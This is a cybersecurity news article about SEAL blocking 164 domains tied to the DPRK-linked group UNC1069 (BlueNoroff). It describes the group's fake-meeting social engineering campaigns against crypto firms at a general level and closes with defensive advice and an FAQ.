Blocked 164 domains tied to the Democratic People’s Republic of Korea-linked threat group UNC1069, also known as BlueNoroff, in a fresh warning that highlights the group’s increasingly refined social engineering tactics against cryptocurrency and Web3 targets.
According to SEAL, the domains were tracked and wallet-blocked through MetaMask’s eth-phishing-detect project between February 6, 2026, and April 7, 2026.
The organization said the infrastructure was connected to a long-running campaign in which attackers impersonate trusted contacts, schedule fake business meetings, and then trick victims into executing malicious code under the guise of fixing an audio or software issue.
The advisory arrives as security researchers continue to investigate recent supply chain activity, including the compromise of the axios npm package, which involved attack methods consistent with UNC1069 tradecraft.
Fake Zoom Calls to Target Crypto Firms
While the group has historically focused on cryptocurrency firms, exchanges, venture capital contacts, and high-profile individuals in the digital asset space, the latest developments suggest a broader targeting model that could include open-source maintainers and software ecosystems.
SEAL’s findings show that UNC1069 is not relying on mass phishing or crude lures. Instead, the group runs patient, multi-week social engineering operations through platforms such as Telegram, LinkedIn, and Slack.
In many cases, attackers gain access to previously compromised accounts and resume old conversations with intended victims, leveraging the trust and context already established in those relationships.
That means a target may receive a message not from an unknown sender, but from what appears to be a legitimate conference contact, business development lead, or investor they have interacted with before.
When a compromised account is unavailable, attackers reportedly impersonate credible organizations and create convincing professional backstories.
On LinkedIn, this can involve a fake recruiter or business outreach. On Slack, the actor may build an entire workspace to make the interaction feel real before ever proposing a meeting. SEAL notes that these tactics continue to evolve, making static detection increasingly difficult.
A central feature of the campaign is the use of fraudulent Zoom and Microsoft Teams meetings. After establishing rapport, the attacker schedules a call, often using legitimate services such as Calendly, and may wait one or even two weeks before the meeting takes place. That delay is strategic. It removes urgency, lowers suspicion, and makes the interaction feel routine.
Just before the meeting, the target receives a link that appears to point to Zoom or Teams but actually resolves to an attacker-controlled lookalike domain. Once opened, the fake meeting interface loads directly in the browser and closely resembles the legitimate product.
SEAL said these pages leverage real SDKs and can even display video footage of supposed participants, often drawn from public appearances, podcasts, or previously recorded material.
The realism is important because it removes the usual warning signs associated with phishing, such as requests to install suspicious software or open unfamiliar files.
Instead, the compromise occurs when the victim is told there is an audio issue. The page prompts the user to “fix” the problem, while the attacker simultaneously messages them through Telegram or Slack, reassuring them that the issue is common and easy to resolve.
In some cases, victims are instructed to click a button that downloads a single AppleScript file with the .scpt extension. In others, they are told to paste a command into the terminal. SEAL said the visible code is often padded with harmless-looking text to make the malicious action harder to spot.
From there, the initial script contacts the attacker’s infrastructure and pulls down a second-stage implant. Researchers say the operators are highly protective of that infrastructure, sometimes allowing only a single download per specific victim identifier. If they suspect they are dealing with a security team or researcher rather than a live target, they may shut down the infrastructure entirely.
Once executed, the implant assigns the infected machine a unique identifier, performs basic host reconnaissance, establishes persistence, and begins beaconing to command-and-control infrastructure roughly every 60 seconds. The malware has been observed in Nim-based variants and in native macOS formats.
Critically, the implant can receive and execute follow-on tasks directly from the server, allowing operators to tailor post-exploitation activity based on the value of the victim.
SEAL said UNC1069’s post-compromise framework is modular and supports a wide range of capabilities. Observed functions include theft of browser-stored credentials, crypto wallet files, seed phrases, API keys, password manager data, Telegram session tokens, SSH keys, and cloud credentials.
The group has also deployed keyloggers, harvested authentication tokens for downstream account takeovers, and replaced legitimate browser extensions on disk with malicious versions.
While macOS remains the primary platform of interest due to its popularity among cryptocurrency professionals, Windows and Linux variants have also been documented.
One of the more troubling aspects of the operation is what happens after the initial breach. Rather than moving immediately, the attackers often remain quiet, allowing the victim to continue normal activity and even reschedule the failed call.
That restraint can buy valuable time for deeper reconnaissance, credential theft, and lateral propagation before incident response teams become aware of the compromise.
SEAL warned that this propagation risk is especially severe because compromised Telegram, Slack, and LinkedIn accounts can then be used to target the victim’s own network of trusted contacts. In practice, that allows UNC1069 to weaponize years of professional relationships and extend attacks far beyond the first infected organization.
The latest domain-blocking effort offers a rare public look at the infrastructure supporting these campaigns. Still, it also underscores a broader defensive problem for the crypto industry and adjacent technology sectors.
Traditional phishing awareness training often focuses on suspicious attachments, fake login pages, or urgent requests. UNC1069’s operations are different: they are slow, credible, conversational, and supported by real-time human interaction.
That makes them significantly harder to detect and far more dangerous for executives, founders, developers, and investors who routinely communicate across open messaging platforms.
Security teams should treat unexpected meeting “fixes,” terminal copy-paste instructions, and browser-based prompts to update audio or SDK components as high-risk behaviors, especially when paired with last-minute conferencing links.
The overlap between social engineering, identity compromise, and malware delivery in UNC1069’s campaigns shows how DPRK-linked operators continue to adapt beyond conventional phishing and into high-trust, high-conviction intrusion paths designed to steal cryptocurrency and sensitive enterprise data at scale.
FAQ 1: What is UNC1069?
UNC1069, also known as BlueNoroff, is a DPRK-linked threat group that targets cryptocurrency and Web3 organizations through highly tailored social engineering attacks.
FAQ 2: How does the attack usually begin?
It typically starts with a trusted or impersonated contact inviting the victim to a fake Zoom or Teams meeting that leads to the execution of malicious code.
Site: thecybrdef.com
About the Author
